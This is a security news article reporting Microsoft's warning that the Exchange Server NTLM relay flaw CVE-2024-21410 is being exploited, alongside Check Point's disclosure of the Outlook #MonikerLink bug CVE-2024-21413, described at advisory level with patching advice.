Connect with us

Hi, what are you looking for?



Microsoft Warns of Exploited Exchange Server Zero-Day

Microsoft says a newly patched Exchange Server vulnerability (CVE-2024-21410) has been exploited in attacks.

Microsoft warned on Wednesday that a newly addressed vulnerability in Exchange Server has been actively exploited in attacks.

Tracked as CVE-2024-21410 (CVSS score of 9.8), the critical-severity flaw is described as a privilege escalation issue that allows attackers to mount pass-the-hash attacks.

According to Microsoft, an attacker could exploit the bug to relay a user’s Net-NTLMv2 hash against a vulnerable server and authenticate as that user.

“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf,” Microsoft explains in its advisory.

The root cause of the vulnerability, the tech giant notes, is that NTLM credential relay protection, or Extended Protection for Authentication (EPA), was not enabled by default in Exchange Server 2019.

The issue has been addressed with the release of Exchange Server 2019 Cumulative Update 14 (CU14), which brings several other improvements and fixes as well.

Initially, Microsoft’s advisory on CVE-2024-21410 did not flag the bug as exploited, but the company updated it on Wednesday, to change the exploitation flag to “indicate that Microsoft was aware of exploitation of this vulnerability”.

The tech giant has shared no details on the observed exploitation attempts. Last year, however, Microsoft blamed a Russia-based threat actor for NTLM relay attacks targeting an Outlook zero-day.

Advertisement. Scroll to continue reading.

On Wednesday, cybersecurity firm Check Point published details on another critical-severity Outlook vulnerability, CVE-2024-21413 (CVSS score of 9.8). Resolved on February 2024 Patch Tuesday, the bug allows attackers to bypass the Office Protected View and execute code remotely.

The issue can be triggered using crafted hyperlinks that utilize the ‘file://’ protocol, “followed by a specific path, an exclamation mark, and additional arbitrary characters”, Check Point, which named the flaw #MonikerLink, explains.

“The #MonikerLink bug allows for a wide and serious impact, varying from leaking of local NTLM credential information to arbitrary code execution. This is due to the misuse of the Component Object Model (COM) on Windows, where Outlook incorrectly parses a specially crafted hyperlink to access COM objects,” Check Point says.

Attacks exploiting CVE-2024-21413 are trivial, do not prompt security warnings or error messages, and can lead to data theft, malware execution, privilege escalation, and victim impersonation.

“Both individual users and organizations are urged to apply any patches or security updates provided by Microsoft, to follow recommended security practices, and to remain vigilant against suspicious hyperlinks and emails,” Check Point notes.

Related: Outlook Plays Attacker Tunes: Vulnerability Chain Leading to Zero-Click RCE

Related: New NTLM Hash Leak Attacks Target Outlook, Windows Programs

Related: Russian APT Used Zero-Click Outlook Exploit

Written By

Ionut Arghire is an international correspondent for SecurityWeek.


Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.


SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.


People on the Move

Shay Mowlem has been named CMO of runtime and application security company Contrast Security.

Attack detection firm Vectra AI has appointed Jeff Reed to the newly created role of Chief Product Officer.

Shaun Khalfan has joined payments giant PayPal as SVP, CISO.

More People On The Move

Expert Insights

Related Content


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Data Breaches

OpenAI has confirmed a ChatGPT data breach on the same day a security firm reported seeing the use of a component affected by an...

IoT Security

A group of seven security researchers have discovered numerous vulnerabilities in vehicles from 16 car makers, including bugs that allowed them to control car...


A researcher at IOActive discovered that home security systems from SimpliSafe are plagued by a vulnerability that allows tech savvy burglars to remotely disable...

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...


Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.


Patch Tuesday: Microsoft warns vulnerability (CVE-2023-23397) could lead to exploitation before an email is viewed in the Preview Pane.

IoT Security

A vulnerability affecting Dahua cameras and video recorders can be exploited by threat actors to modify a device’s system time.